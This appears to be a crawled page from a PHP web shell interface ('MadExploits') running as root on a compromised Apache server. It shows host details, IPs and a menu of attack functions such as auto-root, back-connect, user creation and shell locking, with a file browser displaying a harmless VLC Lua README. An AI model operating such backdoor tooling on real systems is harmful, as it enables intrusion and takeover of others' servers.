Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
vlc /
lua /
meta /
[ HOME SHELL ]
Name
Size
Permission
Action
art
[ DIR ]
drwxr-xr-x
fetcher
[ DIR ]
drwxr-xr-x
reader
[ DIR ]
drwxr-xr-x
README.txt
805
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.txt
## Generic instructions about VLC Lua meta scripts. There are 3 types of Lua meta modules: art, fetcher and reader. See their respective README.txt for documentation. See lua/README.txt for generic documentation about Lua usage in VLC. ## API VLC Lua meta modules should define a descriptor function: * descriptor(): returns a table with information about the module. This table has the following member: .scope: Search scope of the script. Can be "network" or "local". and defaults to "network". "local" scripts are considered fast and processed first. "network" scripts are considered slow and processed in a second pass only if policy allows it. Example: function descriptor() return { scope="network" } end
Close